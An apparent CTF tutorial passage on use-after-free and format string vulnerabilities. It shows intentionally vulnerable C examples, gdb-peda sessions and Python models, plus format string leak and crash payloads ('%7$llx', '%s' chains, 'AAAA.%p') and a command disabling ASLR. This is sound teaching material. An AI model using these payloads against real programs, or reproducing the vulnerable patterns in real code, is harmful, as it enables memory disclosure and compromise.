Once free is called on an allocation, the allocator is free to reallocate that chunk of memory in future calls to malloc if it so chooses. However, if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called use after free or UAF.
Example
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
typedef struct string {
unsigned length;
char *data;
} string;
int main() {
struct string* s = malloc(sizeof(string));
puts("Length:");
scanf("%u", &s->length);
s->data = malloc(s->length + 1);
memset(s->data, 0, s->length + 1);
puts("Data:");
read(0, s->data, s->length);
free(s->data);
free(s);
char *s2 = malloc(16);
memset(s2, 0, 16);
puts("More data:");
read(0, s2, 15);
// Now using s again, a UAF
puts(s->data);
return 0;
}
In this example, we have a string structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string. Due to how Glibc's allocator works, s2 will actually get the same memory as the original s allocation, which in turn gives us the ability to control the s->data pointer. This could be used to leak program data.
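Why s2 lands on top of s can be pictured with a toy allocator. This sketch assumes a last-in, first-out free list per chunk size, which is loosely how recently freed small chunks are reused by glibc; the ToyAllocator class, its 16-byte rounding, and the addresses are all made up for illustration.

```python
class ToyAllocator:
    """Toy model: one LIFO free list per rounded chunk size (not glibc's real logic)."""

    def __init__(self):
        self.next_addr = 0x1000
        self.sizes = {}          # address -> rounded chunk size
        self.free_lists = {}     # rounded size -> list of freed addresses

    def malloc(self, size):
        size = max(16, -(-size // 16) * 16)   # round up to a multiple of 16
        bucket = self.free_lists.get(size)
        if bucket:
            return bucket.pop()               # most recently freed chunk is reused first
        addr = self.next_addr
        self.next_addr += size
        self.sizes[addr] = size
        return addr

    def free(self, addr):
        self.free_lists.setdefault(self.sizes[addr], []).append(addr)

heap = ToyAllocator()
s = heap.malloc(16)          # struct string (assumed to be 16 bytes)
data = heap.malloc(8 + 1)    # s->data for a user-chosen length of 8
heap.free(data)
heap.free(s)
s2 = heap.malloc(16)         # same size class as s
print(hex(s), hex(s2), s2 == s)
```

Because s was freed last, it is handed out first, so the bytes later read into s2 overlap the stale length and data fields of s.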
Advanced Heap Exploitation
Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc, free, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:
Format String Vulnerability
A format string vulnerability is a bug where user input is passed as the format argument to printf, scanf, or another function in that family.
The format argument has many different specifiers which could allow an attacker to leak data if they control the format argument to printf. Since printf and similar are variadic functions, they will continue reading data off of the stack according to the format.
For example, if we can make the format argument "%x.%x.%x.%x", printf will read four stack values and print them in hexadecimal, potentially leaking sensitive information.
printf can also index to an arbitrary "argument" with the following syntax: "%n$x" (where n is the decimal index of the argument you want).
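The way printf walks its arguments can be imitated with a short parser. This is a toy sketch: toy_printf is a hypothetical helper that only understands %x and %N$x, and the list of stack values is invented for the example.

```python
import re

def toy_printf(fmt, stack):
    """Expand %x and %N$x by reading 'arguments' from `stack` (a list of ints)."""
    next_arg = 0

    def expand(match):
        nonlocal next_arg
        index = match.group(1)
        if index is not None:
            value = stack[int(index) - 1]   # %N$x: N is a 1-based argument index
        else:
            value = stack[next_arg]         # plain %x: take the next slot
            next_arg += 1
        return format(value, "x")

    return re.sub(r"%(?:(\d+)\$)?x", expand, fmt)

# Hypothetical values sitting where printf expects its variadic arguments.
stack = [0x1, 0xffffd2a0, 0x0, 0xcafe, 0x41414141, 0x0, 0x8badf00d]

print(toy_printf("%x.%x.%x.%x", stack))   # walks the first four slots in order
print(toy_printf("%7$x", stack))          # jumps straight to the seventh slot
```

The function never checks how many arguments the caller really supplied, which is the same blind trust that makes the real bug exploitable.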
While these bugs are powerful, they're much rarer nowadays, as modern compilers such as GCC and Clang can warn when printf is called with a non-constant format string.
Example
#include <stdio.h>
#include <unistd.h>
int main() {
int secret_num = 0x8badf00d;
char name[64] = {0};
read(0, name, 64);
printf("Hello ");
printf(name);
printf("! You'll never get my secret!\n");
return 0;
}
Due to how GCC decided to lay out the stack, secret_num is actually at a lower address on the stack than name, so we only have to go to the 7th "argument" in printf to leak the secret:
$ ./fmt_string
%7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!
Binary Exploitation
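3.1.1 Format String Vulnerabilities
Formatted Output Functions and Format Strings
In the C language basics chapter, we covered formatted output functions and format strings in detail. Before exploring format string vulnerabilities, reviewing that chapter is strongly recommended. Here we briefly recap a few of the commonly used ones.
Functions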
#include <stdio.h>
int printf(const char *format, ...);
int fprintf(FILE *stream, const char *format, ...);
int dprintf(int fd, const char *format, ...);
int sprintf(char *str, const char *format, ...);
int snprintf(char *str, size_t size, const char *format, ...);
Conversion Specifiers
Character | Type | Usage |
---|---|---|
d | 4-byte | Integer |
u | 4-byte | Unsigned Integer |
x | 4-byte | Hex |
s | 4-byte ptr | String |
c | 1-byte | Character |
Length Modifiers
Character | Type | Usage |
---|---|---|
hh | 1-byte | char |
h | 2-byte | short int |
l | 4-byte | long int |
ll | 8-byte | long long int |
Examples
#include<stdio.h>
#include<stdlib.h>
void main() {
char *format = "%s";
char *arg1 = "Hello World!\n";
printf(format, arg1);
}
printf("%03d.%03d.%03d.%03d", 127, 0, 0, 1); // "127.000.000.001"
printf("%.2f", 1.2345); // 1.23
printf("%#010x", 3735928559); // 0xdeadbeef
printf("%s%n", "01234", &n); // n = 5
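For these particular conversions, Python's % operator follows the same syntax as C's printf, which makes it a convenient way to check a format string without compiling anything. This is only an offline aid in Python 3, not part of the original chapter; Python has no %n, so the count is computed by hand:

```python
# Same format strings as the C one-liners above.
print("%03d.%03d.%03d.%03d" % (127, 0, 0, 1))  # 127.000.000.001
print("%.2f" % 1.2345)                          # 1.23
print("%#010x" % 3735928559)                    # 0xdeadbeef

# Python has no %n. The value %n would store is simply the number of
# characters produced before it.
n = len("%s" % "01234")
print(n)  # 5
```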
How Format String Vulnerabilities Work
On x86, the arguments to a format function are passed on the stack. Consider an example:
#include<stdio.h>
void main() {
printf("%s %d %s", "Hello World!", 233, "\n");
}
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x0000053d <+0>: lea ecx,[esp+0x4]
0x00000541 <+4>: and esp,0xfffffff0
0x00000544 <+7>: push DWORD PTR [ecx-0x4]
0x00000547 <+10>: push ebp
0x00000548 <+11>: mov ebp,esp
0x0000054a <+13>: push ebx
0x0000054b <+14>: push ecx
0x0000054c <+15>: call 0x585 <__x86.get_pc_thunk.ax>
0x00000551 <+20>: add eax,0x1aaf
0x00000556 <+25>: lea edx,[eax-0x19f0]
0x0000055c <+31>: push edx
0x0000055d <+32>: push 0xe9
0x00000562 <+37>: lea edx,[eax-0x19ee]
0x00000568 <+43>: push edx
0x00000569 <+44>: lea edx,[eax-0x19e1]
0x0000056f <+50>: push edx
0x00000570 <+51>: mov ebx,eax
0x00000572 <+53>: call 0x3d0 <printf@plt>
0x00000577 <+58>: add esp,0x10
0x0000057a <+61>: nop
0x0000057b <+62>: lea esp,[ebp-0x8]
0x0000057e <+65>: pop ecx
0x0000057f <+66>: pop ebx
0x00000580 <+67>: pop ebp
0x00000581 <+68>: lea esp,[ecx-0x4]
0x00000584 <+71>: ret
End of assembler dump.
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x56557000 --> 0x1efc
EBX: 0x56557000 --> 0x1efc
ECX: 0xffffd250 --> 0x1
EDX: 0x5655561f ("%s %d %s")
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd220 --> 0x5655561f ("%s %d %s")
EIP: 0x56555572 (<main+53>: call 0x565553d0 <printf@plt>)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555569 <main+44>: lea edx,[eax-0x19e1]
0x5655556f <main+50>: push edx
0x56555570 <main+51>: mov ebx,eax
=> 0x56555572 <main+53>: call 0x565553d0 <printf@plt>
0x56555577 <main+58>: add esp,0x10
0x5655557a <main+61>: nop
0x5655557b <main+62>: lea esp,[ebp-0x8]
0x5655557e <main+65>: pop ecx
Guessed arguments:
arg[0]: 0x5655561f ("%s %d %s")
arg[1]: 0x56555612 ("Hello World!")
arg[2]: 0xe9
arg[3]: 0x56555610 --> 0x6548000a ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x5655561f ("%s %d %s")
0004| 0xffffd224 --> 0x56555612 ("Hello World!")
0008| 0xffffd228 --> 0xe9
0012| 0xffffd22c --> 0x56555610 --> 0x6548000a ('\n')
0016| 0xffffd230 --> 0xffffd250 --> 0x1
0020| 0xffffd234 --> 0x0
0024| 0xffffd238 --> 0x0
0028| 0xffffd23c --> 0xf7df1253 (<__libc_start_main+243>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555572 in main ()
gdb-peda$ r
Continuing
Hello World! 233
[Inferior 1 (process 27416) exited with code 022]
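Under the cdecl calling convention, the arguments are pushed onto the stack from right to left before printf() is entered. Once inside, printf() takes its first argument, the format string, and reads it one character at a time. If a character is not %, it is copied directly to the output. Otherwise, printf() reads the characters that follow, fetches the corresponding argument, and formats it for output. (Note: the space in % d is parsed as a flag and does not end the specifier, so % d still converts an int just like %d, with a leading space for non-negative values.)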
Next, we modify the program above by appending %x %x %x %3$s to the format string, which introduces a format string vulnerability:
#include<stdio.h>
void main() {
printf("%s %d %s %x %x %x %3$s", "Hello World!", 233, "\n");
}
The disassembly is the same as before. The part of interest is how the arguments are passed:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x56557000 --> 0x1efc
EBX: 0x56557000 --> 0x1efc
ECX: 0xffffd250 --> 0x1
EDX: 0x5655561f ("%s %d %s %x %x %x %3$s")
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd220 --> 0x5655561f ("%s %d %s %x %x %x %3$s")
EIP: 0x56555572 (<main+53>: call 0x565553d0 <printf@plt>)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555569 <main+44>: lea edx,[eax-0x19e1]
0x5655556f <main+50>: push edx
0x56555570 <main+51>: mov ebx,eax
=> 0x56555572 <main+53>: call 0x565553d0 <printf@plt>
0x56555577 <main+58>: add esp,0x10
0x5655557a <main+61>: nop
0x5655557b <main+62>: lea esp,[ebp-0x8]
0x5655557e <main+65>: pop ecx
Guessed arguments:
arg[0]: 0x5655561f ("%s %d %s %x %x %x %3$s")
arg[1]: 0x56555612 ("Hello World!")
arg[2]: 0xe9
arg[3]: 0x56555610 --> 0x6548000a ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x5655561f ("%s %d %s %x %x %x %3$s")
0004| 0xffffd224 --> 0x56555612 ("Hello World!")
0008| 0xffffd228 --> 0xe9
0012| 0xffffd22c --> 0x56555610 --> 0x6548000a ('\n')
0016| 0xffffd230 --> 0xffffd250 --> 0x1
0020| 0xffffd234 --> 0x0
0024| 0xffffd238 --> 0x0
0028| 0xffffd23c --> 0xf7df1253 (<__libc_start_main+243>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555572 in main ()
gdb-peda$ c
Continuing.
Hello World! 233
ffffd250 0 0
[Inferior 1 (process 27480) exited with code 041]
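The stack layout is the same as last time; only the format string has changed. The program printed seven values (including the newlines), although we supplied only the first three. The three %x specifiers printed the stack contents at 0xffffd230~0xffffd238, none of which we passed in. The final specifier, %3$s, reuses the \n stored at 0xffffd22c.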
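In the previous example, the format string asked for more arguments than we supplied. In the next example, we omit the format string altogether, which is also vulnerable: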
#include<stdio.h>
void main() {
char buf[50];
if (fgets(buf, sizeof buf, stdin) == NULL)
return;
printf(buf);
}
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1fa ("Hello %x %x %x !\n")
EBX: 0x56557000 --> 0x1ef8
ECX: 0xffffd1fa ("Hello %x %x %x !\n")
EDX: 0xf7f9685c --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd1e0 --> 0xffffd1fa ("Hello %x %x %x !\n")
EIP: 0x5655562a (<main+77>: call 0x56555450 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555623 <main+70>: sub esp,0xc
0x56555626 <main+73>: lea eax,[ebp-0x3e]
0x56555629 <main+76>: push eax
=> 0x5655562a <main+77>: call 0x56555450 <printf@plt>
0x5655562f <main+82>: add esp,0x10
0x56555632 <main+85>: jmp 0x56555635 <main+88>
0x56555634 <main+87>: nop
0x56555635 <main+88>: mov eax,DWORD PTR [ebp-0xc]
Guessed arguments:
arg[0]: 0xffffd1fa ("Hello %x %x %x !\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd1e0 --> 0xffffd1fa ("Hello %x %x %x !\n")
0004| 0xffffd1e4 --> 0x32 ('2')
0008| 0xffffd1e8 --> 0xf7f95580 --> 0xfbad2288
0012| 0xffffd1ec --> 0x565555f4 (<main+23>: add ebx,0x1a0c)
0016| 0xffffd1f0 --> 0xffffffff
0020| 0xffffd1f4 --> 0xffffd47a ("/home/firmy/Desktop/RE4B/c.out")
0024| 0xffffd1f8 --> 0x65485ea0
0028| 0xffffd1fc ("llo %x %x %x !\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x5655562a in main ()
gdb-peda$ c
Continuing.
Hello 32 f7f95580 565555f4 !
[Inferior 1 (process 28253) exited normally]
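If everyone behaves and types ordinary characters, the program works fine. But because there is no separate format string, any conversion specifiers we type into buf are parsed by printf() as a format string, and the vulnerability is triggered. In the demonstration above we entered Hello %x %x %x !\n (the trailing \n is the newline we typed, which fgets() keeps in the buffer), and the program printed data from the stack.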
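To summarize, a format string vulnerability arises when the arguments the format string asks for do not match the arguments actually supplied. This raises two questions:
- Why does the program compile?
  - Because printf() is declared to take a variable number of arguments.
  - To catch a mismatch, the compiler would need to understand how printf() works and what a format string is. The C language does not require this; compilers that check format strings do so only as an optional diagnostic.
  - Sometimes the format string is not fixed at all; it may be generated dynamically at run time.
- Can printf() detect the mismatch itself?
  - printf() fetches its arguments from the stack: if it needs three, it takes three. Unless the boundary of the argument area were marked, printf() cannot know that it has taken more arguments than were supplied, and no such marker exists.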
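The unbounded argument walk can be modeled in a few lines of Python 3. This is a toy sketch, not how any libc implements printf: mini_printf and stack_words are hypothetical names, only %d, %x and the positional form %N$x are handled, and the stack values are borrowed from the gdb dump earlier in this section.

```python
import re

def mini_printf(fmt, stack):
    """Toy model of printf's argument walk on 32-bit cdecl.

    `stack` lists the 4-byte words stored above the format-string
    pointer. Only %x, %d and the positional form %N$x are modeled.
    """
    next_arg = 0  # internal "argument pointer"; nothing bounds it

    def convert(match):
        nonlocal next_arg
        position, conv = match.group(1), match.group(2)
        if position:                      # %N$x: pick word N directly
            word = stack[int(position) - 1]
        else:                             # %x / %d: take the next word
            word = stack[next_arg]
            next_arg += 1
        return format(word, "x") if conv == "x" else str(word)

    return re.sub(r"%(?:(\d+)\$)?([xd])", convert, fmt)

# The caller passed one real argument (233). The other words are simply
# whatever else is on the stack.
stack_words = [233, 0xFFFFD250, 0x0, 0x0]
print(mini_printf("%d %x %x %x", stack_words))  # 233 ffffd250 0 0
```

Unlike this model, where indexing past the list raises an IndexError, the real printf() has no list length to check and keeps reading.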
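Exploiting Format String Vulnerabilities
By supplying the format string, we control the behavior of the formatting function. The main ways to exploit the vulnerability are described below.
Crashing the Program
Format string vulnerabilities are usually discovered only when a program crashes, so the simplest way to exploit one is to crash the process. On Linux, accessing an invalid pointer makes the process receive a SIGSEGV signal, which terminates it abnormally and can produce a core dump (core dumps are covered in detail in the Linux basics chapter). A core dump holds a great deal of important information about the program at the moment of the crash, which is exactly what an attacker needs.
A format string like the following triggers the vulnerability: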
printf("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s")
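- For each %s, printf() fetches a number from the stack, treats it as an address, and prints the memory at that address until it reaches a NUL byte.
- Not every number fetched can be a valid address, so the memory it refers to may not exist.
- The number may also be a real address that is protected.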
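Viewing the Stack
Crashing the program is only the first step in confirming the vulnerability. An attacker can also use formatted output functions to read memory in preparation for the next stage of the exploit. As we have seen, a formatting function fetches values from the stack as directed by the format string. Because the stack on x86 grows from high addresses toward low addresses, and the arguments to printf() are pushed in reverse order, the arguments appear in memory in the same order as they appear in the printf() call.
The demonstrations below all use the following source code: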
#include<stdio.h>
void main() {
char format[128];
int arg1 = 1, arg2 = 0x88888888, arg3 = -1;
char arg4[10] = "ABCD";
scanf("%s", format);
printf(format, arg1, arg2, arg3, arg4);
printf("\n");
}
# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -fno-stack-protector -no-pie fmt.c
We first set a breakpoint with b main, step with n, enter %08x.%08x.%08x.%08x.%08x when execution reaches call 0x56555460 <__isoc99_scanf@plt>, and then resume with c to see the output.
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ x/10x $esp
0xffffd550: 0xffffd584 0x00000001 0x88888888 0xffffffff
0xffffd560: 0xffffd57a 0xffffd584 0x56555220 0x565555d7
0xffffd570: 0xf7ffda54 0x00000001
gdb-peda$ c
Continuing.
00000001.88888888.ffffffff.ffffd57a.ffffd584
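The pointer to the format string (0xffffd584) sits in memory immediately before the arguments arg1, arg2, arg3, and arg4. The format string %08x.%08x.%08x.%08x.%08x makes printf() fetch five arguments from the stack and print each as an 8-digit hexadecimal number. A formatted output function uses an internal variable to track the position of the next argument. Initially this argument pointer points at the first argument (arg1). As each argument is consumed by its conversion specification, the pointer advances by the size of that argument. Once the arguments actually passed are used up, printf() goes on to display the calling function's remaining automatic variables, followed by the rest of its stack frame (including the return address, its own arguments, and so on).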
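Output like the dump above is easier to work with once it is parsed back into integers. A minimal Python 3 sketch follows; parse_leak and the labels in names are hypothetical and chosen only for this illustration:

```python
def parse_leak(output, sep="."):
    """Split a '%08x.%08x...' style leak into a list of integers."""
    return [int(field, 16) for field in output.strip().split(sep)]

# Output of the %08x.%08x.%08x.%08x.%08x run shown above.
leak = parse_leak("00000001.88888888.ffffffff.ffffd57a.ffffd584")
names = ["arg1", "arg2", "arg3", "arg4 (pointer)", "next stack word"]
for name, word in zip(names, leak):
    print(f"{name:>16}: 0x{word:08x}")

# %x prints the raw 32-bit pattern; reinterpret arg3 as a signed int.
arg3_signed = leak[2] - (1 << 32) if leak[2] & 0x80000000 else leak[2]
print(arg3_signed)  # -1
```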
The format string %p.%p.%p.%p.%p produces a similar dump:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%p.%p.%p.%p.%p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%p.%p.%p.%p.%p")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%p.%p.%p.%p.%p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%p.%p.%p.%p.%p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%p.%p.%p.%p.%p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ c
Continuing.
0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584
The methods above fetch the values on the stack in sequence. To fetch one specific argument directly, use a format string like the following:
%<arg#>$<format>
%n$x
Here n selects the n-th value on the stack after the format string pointer.
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ x/10w $esp
0xffffd550: 0xffffd584 0x00000001 0x88888888 0xffffffff
0xffffd560: 0xffffd57a 0xffffd584 0x56555220 0x565555d7
0xffffd570: 0xf7ffda54 0x00000001
gdb-peda$ c
Continuing.
ffffffff.00000001.0x88888888.0x88888888.0xffffd57a.0xffffd584.0x56555220
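Here the format string is at 0xffffd584. With the format string %3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p we fetched arg3, arg1, arg2 twice, arg4, and the two values that follow the arguments on the stack. This technique is very powerful: it can read any value on the stack.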
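Typing positional specifiers by hand gets tedious when scanning many stack slots. As a small Python 3 sketch (positional_probe is a hypothetical helper, not part of any tool), a range of them can be generated:

```python
def positional_probe(first, last, conv="p", sep="."):
    """Build '%first$p.%(first+1)$p...' up to and including `last`."""
    return sep.join(f"%{i}${conv}" for i in range(first, last + 1))

print(positional_probe(1, 6))
# %1$p.%2$p.%3$p.%4$p.%5$p.%6$p
```

When passing the result through a shell, single-quote it so that $p is not expanded as a variable.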
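Reading Memory at an Arbitrary Address
An attacker can use a conversion specification that displays the memory at a given address to read arbitrary memory. For example, %s treats its argument as a pointer and displays the memory it points to as an ASCII string until it reaches a NUL byte. If the attacker can make that argument point at a chosen address, %s prints the memory at that location.
Using the same program, if we enter %4$s, arg4 is printed as ABCD rather than as the address 0xffffd57a: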
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%4$s")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%4$s")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%4$s")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%4$s")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%4$s")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ c
Continuing.
ABCD
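The example above can only read through pointers that are already on the stack. To read an arbitrary address, we have to place that address on the stack ourselves. We enter a format string of the form AAAA.%p and observe how the stack changes.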
gdb-peda$ python print("AAAA"+".%p"*20)
AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
...
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
